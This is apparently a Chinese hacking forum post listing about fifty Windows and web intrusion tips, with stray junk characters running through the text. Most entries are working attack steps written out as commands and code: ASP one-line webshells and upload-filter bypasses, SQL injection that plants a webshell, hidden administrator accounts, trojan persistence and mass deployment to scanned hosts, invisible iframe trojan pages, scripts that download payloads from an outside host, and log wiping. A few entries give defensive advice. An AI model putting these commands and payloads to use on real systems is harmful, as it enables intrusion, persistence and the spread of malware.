Xp系统修改权限防止病毒或木马等破坏系统,cmd下,( \4 k- Q; [/ H# K
cacls C:\windows\system32 /G hqw20:R
$ k# W# K+ c8 E( \/ g, l0 L3 l. v思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
% }% X+ w7 H, r恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F7 ]+ q$ o5 U h# B
+ b+ ^, M/ P; o O: P R2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。6 T6 A; c. Y* C1 N4 d& r
: R8 v9 l8 U/ P: I( X" |# U; A% Z3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
# ~' x9 O# _1 ~' S2 e% f0 R! b; j: o, h4 L
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
, z U7 a' P7 U7 p: E
$ E6 f4 k1 @* n! C5、利用INF文件来修改注册表3 u4 N6 N/ R: Q4 w& v; g2 k0 @7 a
[Version]# C, E' _) X/ L' Z+ T. @6 W
Signature="$CHICAGO$"$ ~8 {; i5 b7 |' z" D8 E2 s) m
[Defaultinstall]
2 m7 n" S4 @9 C0 x; SaddREG=Ating# A$ g: ^4 U# F) J- l
[Ating]
: X# g2 b4 }* e3 c& x+ C/ f" gHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
* a5 q3 j3 f" m1 H以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:0 I+ w0 C6 W- i3 R
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径7 `% u c* a& K: N) r
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU" L+ O2 [4 ]& \; E0 e; D
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU6 P& l4 Q1 |/ _3 G5 X/ R- |% P. o
HKEY_CURRENT_CONFIG 简写为 HKCC
1 s, G$ Z* u5 f0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值+ t) f! i7 u! a
"1"这里代表是写入或删除注册表键值中的具体数据3 t8 d" t0 `5 L# A2 d3 [/ o
9 r, Y3 W4 k0 e! G B# \6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,; h" W& H1 j; u1 c
多了一步就是在防火墙里添加个端口,然后导出其键值# E1 z# _5 v4 S- ]0 [# m1 a
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
# y: _! V; T& N" h0 R0 I9 z6 o& P* n- m, o5 S6 i
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
* M! k7 t6 O' ^' C) n" f# M% j在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。) F5 S% M6 b6 Q* Z
& j3 b _- f) Z& p5 c+ {6 D8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
9 i' V/ B7 K4 S L" A/ k$ d8 B
7 _$ w' l, ?8 w6 a. ]9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
0 u, U8 L/ r4 E# \9 N2 ^可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
: t3 q: |3 J0 q$ u+ L+ z& H4 _4 f
# G% u7 ?. a& f' f9 v10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”4 g( n" Y' n" c6 m! g
5 k6 O) {8 q5 V/ m11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,* Z0 z- C. Z' s
用法:xsniff –pass –hide –log pass.txt) H6 w) u4 X) E! p+ z, r5 }7 i
9 w) c5 Q: Q6 G12、google搜索的艺术
: A, H: n2 A, C# g" o5 `6 w/ l( s搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
4 \% `; i4 f$ Y& x E或“字符串的语法错误”可以找到很多sql注入漏洞。
# }5 a6 F, Z3 o6 |6 Q3 J
+ z' X8 c% P6 {13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
X0 I8 {' Q9 G5 h
9 Y3 p! q5 D, l' H14、cmd中输入 nc –vv –l –p 19874 P$ v, c" t% V6 S
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
& G6 j; M6 P! t" R7 g
5 ^ y a9 f2 z15、制作T++木马,先写个ating.hta文件,内容为% [2 b$ r4 F2 L8 n8 h$ q* L& r- l
<script language="VBScript">
. D$ `) A+ O( U! R" L7 bset wshshell=createobject ("wscript.shell" )
+ i$ `2 i& n+ k9 u- sa=wshshell.run("你马的名称",1)
, M& W- V. X8 j, m7 {+ owindow.close- i* V k8 f, L
</script>: y6 |' P! z! ?+ F' F# u
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。' D& [! G m, Y, s& W: Z
1 }! V% u* I. v6 D3 M
16、搜索栏里输入
$ d, h! q! s' y/ y m V关键字%'and 1=1 and '%'='. z2 v* K3 l# p. v. q" V5 u" ?# G) r, h
关键字%'and 1=2 and '%'='
. i8 C R: i$ d( X比较不同处 可以作为注入的特征字符4 j# P& f( g" F W) Y8 `. f4 k
. { Q! ^: N; `) V
17、挂马代码<html>
2 i2 p, w6 s, ?/ H* b3 f% H<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>1 r- A9 ^7 ^; p' I
</html>3 ]9 p" X. _4 S% _: p
3 P# y8 [) d# Y: j5 a# Z18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
: F& i" a2 H& M$ K& f% L/ Lnet localgroup administrators还是可以看出Guest是管理员来。
6 Q1 o1 f A6 C5 M* Z. v2 [4 ~1 n: Y6 }. \. E
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
' u- w" c. U8 m7 y用法: 安装: instsrv.exe 服务名称 路径) H K9 p( [9 A1 |6 G
卸载: instsrv.exe 服务名称 REMOVE4 `" L; T: o% G; u% ]% s6 @
9 l1 y y2 z1 x+ m! u' d, M$ X" u& \" J# K
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉5 k& x _9 }1 i2 J( z
不能注入时要第一时间想到%5c暴库。
" u9 f& R" ~; W0 r) o7 f; o7 D) d+ [5 J# _$ i! `: c* @5 R6 S9 Q0 T
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~" _: H9 k* |' |# o, I+ l* }! ^9 Z
: u. @: i4 }/ V23、缺少xp_cmdshell时
2 Q! t' h+ l$ o0 r& [" ~5 K尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'# `! ?. a0 H. K2 O
假如恢复不成功,可以尝试直接加用户(针对开3389的)5 f' ~ S/ _" K
declare @o int
% o6 v/ |: Y- |$ y2 w9 Uexec sp_oacreate 'wscript.shell',@o out5 R! h' W+ @/ A9 e( x
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
; m r# [; u% }3 J& ~: f2 L3 M% J3 c6 I3 Z$ ~$ V7 n! R! l
24.批量种植木马.bat
. m0 O. e0 r% Lfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中2 K0 I! n! \3 {" v. Q
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
+ y3 Q5 s- [+ ^! z3 ?3 U, M扫描地址.txt里每个主机名一行 用\\开头
5 h5 L2 E) k' ~% U/ f1 ]5 D( ]' l
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
, g+ F ]. H! L; {7 j! W1 x& ]1 ?9 c |
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
o# W8 r) a$ { j% q$ X4 e将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
2 N' L( c- u7 W2 Y" X" r* q.cer 等后缀的文件夹下都可以运行任何后缀的asp木马8 `9 r% ]! X/ n9 v+ v7 y
; Q" V& G: Z/ p
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP5 _ _( H- [: L! ]$ ^
然后用#clear logg和#clear line vty *删除日志
6 M9 G Z3 ~4 H" X/ Q- Z8 c; L8 y# X6 |
28、电脑坏了省去重新安装系统的方法
' [' u# _7 l2 p6 ?# ?4 H纯dos下执行," S" w$ W) {9 t- s+ ~, o6 k
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
0 Y2 |& J- P" ]) `. D. t* u2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
9 l7 ]$ U* t( b4 D% Z4 O
! a/ p+ o) Y+ J6 P29、解决TCP/IP筛选 在注册表里有三处,分别是:' q' e) `+ ^, t( ~
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip$ Q& A1 A# n' G: N& i. d
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
# H3 F$ x3 H; Z0 y6 nHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- ~$ A, }. f7 g. J. v分别用
* A2 R" f- X0 q0 i1 J+ y: n' \regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip5 X: F3 Q7 d7 d8 l o; K! e3 r
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
# D$ R6 [4 G, m$ rregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ i2 U7 U0 }+ U+ j9 \
命令来导出注册表项
1 @4 U- X2 ] c+ ?; o6 A, e( ~. Z# n然后把三个文件里的EnableSecurityFilters"=dword:00000001,
3 r2 `0 q% F( a& I; l* U7 l6 J改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
6 C9 A( [7 x5 a3 Rregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。+ [% Z% H9 A+ y [% `
$ [7 G5 {, @0 i. B30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
* g) j+ P! S4 o/ t7 GSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
" i! K8 O: g1 r( a! N9 q" t7 o) T& |
1 u6 x7 K. h$ Q8 O! [* O31、全手工打造开3389工具& O2 N* A( H) a* O& i9 J; I
打开记事本,编辑内容如下:; x T& N7 q1 m0 i* z
echo [Components] > c:\sql
Y9 y. J. I, s1 \$ q, M' E! Lecho TSEnable = on >> c:\sql
% y( u/ c1 e" w; r" V$ M9 Tsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q0 D) W, u7 L! t3 R2 m s
编辑好后存为BAT文件,上传至肉鸡,执行
$ X5 {; D% ^: T# i3 ?1 `9 T" h2 y$ ^7 ]: x$ }; J/ P- ]
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
7 _( x% ?4 U8 P7 i2 n6 l7 r6 k3 l
33、让服务器重启
; c% a6 n, N! e7 M/ a& S0 N写个bat死循环:
4 R& E% D: k$ e/ A/ P9 }* l* a@echo off, E: Y n9 u- y/ ?+ B- ^9 G* T2 I
:loop1, z) C0 i+ _2 c7 q9 B- N$ @
cls0 \( N- i% C) d! A& v7 F
start cmd.exe) \- N6 _4 A! I: B) ~+ s! z
goto loop1( r6 s* [5 j, S" R' k
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启7 x$ C# R- x. w
* n6 y8 y* d. c ]5 i* N
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,0 U! e# E$ B) q" j0 d1 A/ Y+ z
@echo off
9 j. H* {' {" W! t ?date /t >c:/3389.txt
$ L: S0 O' Y: T' |# A; Y! Mtime /t >>c:/3389.txt
$ [% r" V5 |( a; l& O/ _attrib +s +h c:/3389.bat
( ?4 p- T0 o* p) B2 f8 y: E! l1 z7 iattrib +s +h c:/3389.txt
1 T9 H H3 o& x" i4 Knetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
" j/ N7 _0 X; d, y& D0 W并保存为3389.bat4 ?) {! i5 G0 ` S
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
: z% c2 C! p1 ^# L. v3 ]- b5 K1 G
& z( P4 A6 c, x! h4 l$ k+ S35、有时候提不了权限的话,试试这个命令,在命令行里输入:+ a: }; K a5 y5 g( V( ?
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)/ M: [: \5 C' ~4 T2 S7 j$ ]
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。9 O$ i" n& Q9 E
2 F! t. N1 ?- D( P! L
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件' c z: C) `$ Z. [
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
0 F6 O1 u" U' `$ P9 p. _echo 你的FTP账号 >>c:\1.bat //输入账号0 x" \ ^( ?. T- f9 E1 B0 b& x
echo 你的FTP密码 >>c:\1.bat //输入密码
0 E) u! @7 y8 n3 A; K/ wecho bin >>c:\1.bat //登入' s3 D& l7 E! d
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
% B# d* ], |% p7 n& p$ F: H; z! W( Recho bye >>c:\1.bat //退出
3 v+ V- B8 s' ~: N然后执行ftp -s:c:\1.bat即可
( o; u' p/ @3 s3 v& `4 r0 r
7 q) u/ K$ l, F, L0 Q3 i }) t5 M37、修改注册表开3389两法: k% N9 d5 D; s0 x5 U
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表( B3 m- H' o" C; I3 @
echo Windows Registry Editor Version 5.00 >>3389.reg
- ?/ O% a# G7 Z7 R7 yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg% h9 i3 h1 ~9 r/ b* J! d' m
echo "Enabled"="0" >>3389.reg
% Q5 A; Z1 p& k* d; V0 f4 Vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows! d% m" U" }2 o. |
NT\CurrentVersion\Winlogon] >>3389.reg$ }1 P7 H6 t4 u# j$ j( Y
echo "ShutdownWithoutLogon"="0" >>3389.reg
& V$ p- v, c) s/ A! N$ Z6 Oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
( S( @: N$ ~" M% w>>3389.reg% i9 D: L% b( r' ?8 i2 i
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg9 @! E7 p; k# B1 Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
( A. |! C- t9 o l x5 t+ I& [>>3389.reg
! {5 }9 i7 m: E, q: b* Secho "TSEnabled"=dword:00000001 >>3389.reg
7 p: e% Z4 D5 w; @) Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg; }) B- j- i5 R( a
echo "Start"=dword:00000002 >>3389.reg
& u7 X6 |0 O& N) eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]# N- _5 s! }, g- i
>>3389.reg
! y- A+ P: R3 n# b( y$ P3 a. Kecho "Start"=dword:00000002 >>3389.reg: p9 p+ c' x! C9 g5 [8 O
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
: w! i) L1 l# _; m% Recho "Hotkey"="1" >>3389.reg& c: {) |" [! Z n* W% c7 W+ X
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 L# Y- Q: H9 d, e7 y- d
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
2 M! z* P* s; p Q% \# xecho "PortNumber"=dword:00000D3D >>3389.reg( ~- G7 U" B# I; X
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, p" w' w) g: B7 wServer\WinStations\RDP-Tcp] >>3389.reg
& M! ^6 b" B, B6 S$ A. Xecho "PortNumber"=dword:00000D3D >>3389.reg0 {% b0 s8 r( ^- \& h
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
! L. f: f3 u/ J0 O! _. y/ w(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
$ |2 A0 L6 _; G6 s0 S0 a' t( k% I因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
( d( F! P' E I4 p6 S; b3 d(2)winxp和win2003终端开启
, E) k/ O7 g, u( X/ E! D! w; M用以下ECHO代码写一个REG文件:" X w0 R% k. k7 E( A; u
echo Windows Registry Editor Version 5.00>>3389.reg
. X! m) Y! M1 pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 e* W$ _/ H: w" M3 a7 n8 A. mServer]>>3389.reg
' O/ |4 E5 t; C) q eecho "fDenyTSConnections"=dword:00000000>>3389.reg- f0 U' L2 i! e3 a# |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 u9 d( d9 }: K; j. ]6 [+ ?1 x9 P
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
. G. _ x% E( v6 Wecho "PortNumber"=dword:00000d3d>>3389.reg
& w( Q& ?# e4 E/ D3 i. L. ~% uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* R7 _1 Y6 ]' `8 a+ o9 E* K, X
Server\WinStations\RDP-Tcp]>>3389.reg
9 y' H6 x3 o& C# v H$ s" H3 oecho "PortNumber"=dword:00000d3d>>3389.reg$ c# \; u5 h% U
然后regedit /s 3389.reg del 3389.reg
' q1 J9 W7 y4 H( F4 w3 VXP下不论开终端还是改终端端口都不需重启7 V/ c' M: K+ T
$ E9 d# n0 }: R1 [( J! _5 ~8 \38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃% c# h" ]$ U9 P% A( O1 s6 M1 ^2 _
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'8 P' I- Y; n9 t7 q$ @# Y( m
( g5 v% s% |( J2 Y39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!; |; M3 k) g1 g) M ~- U" Q
(1)数据库文件名应复杂并要有特殊字符, |1 A/ g ?% Z- v
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源; v; k7 R8 m @# K# x
将conn.asp文档中的
6 N3 b( o( P: s0 x2 L; T( KDBPath = Server.MapPath("数据库.mdb")
$ S* j( x. ~! O( W4 I) f+ Uconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
% M% q$ [% U7 K/ R; X( M- z8 M, N$ K
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
2 p7 C: @$ B( b(3)不放在WEB目录里
: g @: ^4 ]. M7 A" {: C3 W8 _: T) a" Q I" \$ u
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
5 O9 T9 _2 x* j& A7 X可以写两个bat文件
$ t N# M: h8 I8 b@echo off
; [, F# k6 l E( k. C, e. `% u@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
% x3 Q" f/ o* ?, U) J+ p M@del c:\winnt\system32\query.exe; u/ b9 p" O- B) e" @2 I3 n
@del %SYSTEMROOT%\system32\dllcache\query.exe8 a. {) U7 J0 O9 y8 c5 y, Y
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
5 ~8 \+ Z8 e* f0 }. |: ]
- b, P9 v1 W" F& P7 W9 _@echo off8 Q$ [) Z C. g' A
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
2 k! {8 V( A- u9 ?2 ?$ n( Z u( k@del c:\winnt\system32\tsadmin.exe
" t" I1 p O0 x# ^( g. ]4 r$ A@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex7 a) w( D& b! k% b1 B* O/ C1 G$ |: M
8 f4 \6 X& L, A& ^% V6 z \41、映射对方盘符
, o; L- _, W9 i8 btelnet到他的机器上,
# v6 e/ l" I8 ]3 @) w* Lnet share 查看有没有默认共享 如果没有,那么就接着运行7 }# Q1 D; n9 p; q
net share c$=c:
. C9 t( {' R B$ u+ C! Y4 Onet share现在有c$) y$ N: _4 G8 Z* w9 ^
在自己的机器上运行+ } o7 L- `& |( | Z
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
# v7 p" B$ ], N9 V; v/ M
9 ]! x9 M# J, R! O8 y' a# t6 ?42、一些很有用的老知识
0 o0 \ @5 ~% J% z1 X( Q" Ctype c:\boot.ini ( 查看系统版本 )4 g1 ~: A* u: R! g, X! D
net start (查看已经启动的服务)
2 o9 G6 F0 n2 cquery user ( 查看当前终端连接 )' Y2 [# S7 S( U8 a1 \3 O' n6 d
net user ( 查看当前用户 )
6 ~2 u0 O/ Z# r# I Hnet user 用户 密码/add ( 建立账号 ), ^6 x n$ `- T! V( L5 p
net localgroup administrators 用户 /add (提升某用户为管理员)) I d6 [: F" y( \
ipconfig -all ( 查看IP什么的 )" Q5 w# J7 c1 M# V
netstat -an ( 查看当前网络状态 )
b/ F+ o: j# x3 \+ |findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
& G% X. C8 H$ {9 ]克隆时Administrator对应1F4+ h* O, x! t+ Y" n! V; C# Q+ T
guest对应1F5
" B) |3 r S" e# d: P2 @; mtsinternetuser对应3E8" E+ J! x8 t/ U4 \
) q/ O8 y9 }# Y/ c7 e
43、如果对方没开3389,但是装了Remote Administrator Service
% Y7 B) v3 f/ U- \ B$ x用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接( K, p& w/ H# V8 f! {% D; t+ |3 ]
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息, }1 N* n8 Z7 x6 \5 |
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
# A" ~# }3 y. C# e+ R- m
1 W1 c3 h! t4 K3 w44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)9 W; p. J& w* Z" y( g/ H7 @
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口); t; `& [" I7 {( l/ c! S
$ f' ]+ U1 t. d1 F @. n45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)0 ~. K4 e3 |2 E
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
1 N) z0 T; q7 Y# c8 p& j6 q^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =4 u: D7 K6 E( m2 m
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
% Y8 ^* p+ ]0 I5 P7 S1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
& L+ A$ n) X: ]6 E3 [6 i(这是完整的一句话,其中没有换行符)) _% M# W) N* a
然后下载:+ d5 M8 A/ ] L7 t! J; u: _* f
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
) P) F J, g+ ?& H7 T5 z
% n8 v( c4 F5 q- i, j# }5 _/ M46、一句话木马成功依赖于两个条件:2 B/ C! f ^/ A4 r- I
1、服务端没有禁止adodb.Stream或FSO组件
- m6 P' p9 R6 T2 K- m2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。' X! A0 c% |- m. ]) a" @' ?7 j/ w
* T& [! N6 q. ]/ N6 r6 O47、利用DB_OWNER权限进行手工备份一句话木马的代码:- |4 l5 J; A+ `5 p2 R
;alter database utsz set RECOVERY FULL--1 @* ^4 A: u: f Z! v
;create table cmd (a image)--
# ?* X, j5 \8 }3 ?: f% m/ T;backup log utsz to disk = 'D:\cmd' with init--
$ A. l$ f+ T. d3 X;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--+ f3 q; @4 \: ^/ t! T, d% y7 y. q0 s
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--" h, |' H" Y4 f3 M, D# T0 R! G
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。7 l+ Q$ G% Z* O. P
' g: N& j4 P, ]1 t2 }+ H48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:8 J$ A: k0 ?. h
5 w2 p! w% C, [% c; J
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options& {% S2 {* I; x. V3 Z+ `
所有会话用 'all'。
( \- I+ } H: H7 ?: j$ x# c-s sessionid 列出会话的信息。
0 U- H4 g& [4 ]4 X-k sessionid 终止会话。5 Y1 v) F6 f9 N* {$ u* }
-m sessionid 发送消息到会话。, Z4 ~* z- m7 G$ S" {8 t
- m* Y: B1 U/ x# Y7 o; L( @- hconfig 配置 telnet 服务器参数。
1 c$ U) w- n, [1 z& X" z) m$ A
' @ W1 \' o7 Z. T4 {4 d5 Gcommon_options 为:! T) i& c x+ A1 l' b* n
-u user 指定要使用其凭据的用户
6 \. H$ y, f' }5 p5 ]$ Z9 z) a$ T-p password 用户密码& ?) c5 N+ G- m) o
8 C1 f1 D& N9 Q7 v/ s4 g8 F/ }8 \config_options 为: x( q( R* S) m+ }& @0 I
dom = domain 设定用户的默认域, @! y6 U& C$ O
ctrlakeymap = yes|no 设定 ALT 键的映射 t! }* H- p( e. W9 j
timeout = hh:mm:ss 设定空闲会话超时值
. h/ B5 w4 T- j5 z0 q3 A1 wtimeoutactive = yes|no 启用空闲会话。
$ `5 u. ?* ?9 z% R5 nmaxfail = attempts 设定断开前失败的登录企图数。
. ]/ e' F9 W$ l# \+ V8 xmaxconn = connections 设定最大连接数。# _' M- t( h ~0 b* W
port = number 设定 telnet 端口。
* [5 l/ B6 [/ w- ysec = [+/-]NTLM [+/-]passwd7 ?7 r5 G* F# A
设定身份验证机构& H h# w5 Q3 K b. G
fname = file 指定审计文件名。. M" ?; R+ W$ ~9 Y3 _
fsize = size 指定审计文件的最大尺寸(MB)。
% `: `6 Y; }3 }! x2 \- nmode = console|stream 指定操作模式。
! _! _0 b. h* ?% z S1 aauditlocation = eventlog|file|both
9 ~ V( F6 r3 }. m; i/ a指定记录地点
& O$ _. _- I- v# ?6 a7 caudit = [+/-]user [+/-]fail [+/-]admin4 K5 z, \: n8 m
/ I+ z/ i0 A: W3 c3 T& P49、例如:在IE上访问:' p, v0 V7 {( h) d P/ @' s
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
4 g( |: i" U; y/ [" Khack.txt里面的代码是:
6 c( M5 m4 {# K& ?' f3 a<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
2 E7 Q* w% Q+ l把这个hack.txt发到你空间就可以了!$ H$ ?7 d2 j2 O
这个可以利用来做网马哦!- p! P! e! |* G5 J
; Z0 ^9 v) Y9 i8 x8 k4 r; J
50、autorun的病毒可以通过手动限制!
: k- n Q! `: j' Z- D5 V1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!0 x% A4 f+ e1 D( y d
2,打开盘符用右键打开!切忌双击盘符~' O9 [7 i- z* B$ V) ?" K
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!0 h/ P5 {' A7 J6 L) [( [
7 [7 M% s2 e3 c- K7 E" |51、log备份时的一句话木马:
5 S- |. G; w! C2 T9 X- ^' za).<%%25Execute(request("go"))%%25>6 c" }; g2 _: e5 d& k
b).<%Execute(request("go"))%>
, m' y. Q& h" ^1 E( H7 M; |, Bc).%><%execute request("go")%><%" Z& \1 \) V$ Z5 r9 D; Z) B1 @( i- g
d).<script language=VBScript runat=server>execute request("sb")</Script>. p: _/ Z, h) B( _7 x+ @
e).<%25Execute(request("l"))%25>
+ o/ x4 z9 D5 f4 K+ q0 Zf).<%if request("cmd")<>"" then execute request("pass")%>/ M- V7 F. q" }, }) g: R3 N
) r: _3 l8 x! o: s; W7 F9 m$ _52、at "12:17" /interactive cmd
: q# p* n8 n$ _+ l( w% u3 H执行后可以用AT命令查看新加的任务
